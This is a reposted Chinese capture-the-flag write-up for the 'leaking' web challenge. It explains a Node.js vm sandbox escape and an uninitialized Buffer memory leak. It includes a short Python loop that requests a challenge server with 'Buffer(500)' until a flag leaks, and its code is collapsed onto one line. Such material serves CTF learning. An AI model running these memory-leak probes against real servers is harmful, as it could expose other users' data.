攻防世界 web高级 leaking
生活随笔
收集整理的這篇文章主要介紹了
攻防世界 web高级 leaking
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
考察:node.js逃逸
參考:
https://blog.csdn.net/weixin_44037296/article/details/112387663
https://blog.csdn.net/weixin_46676743/article/details/112669105
不知道咋說,直接抄源碼
# encoding=utf-8import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)time.sleep(0.1)if 'flag{' in response:print(response)breakflag{4nother_h34rtbleed_in_n0dejs}node.js下的vm
一種隔離運行代碼的沙箱,可以隔離當前環境上下文,但能訪問當前上下文中的global變量
node.js下的沙箱逃逸
由于js原型鏈的原因,可以通過contructor尋找變量prototype的方式,從而執行Function,達到沙箱逃逸的效果
node下的Buffer
在較早一點的node.js版本中 (8.0 之前),當 Buffer 的構造函數傳入數字時, 會得到與數字長度一致的一個 Buffer,并且這個 Buffer 是未清零的。8.0 之后的版本可以通過另一個函數 Buffer.allocUnsafe(size) 來獲得未清空的內存。
總結
以上是生活随笔為你收集整理的攻防世界 web高级 leaking的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Fuzzing论文_CONCURR CO
- 下一篇: PLSQL启动报错:Initializa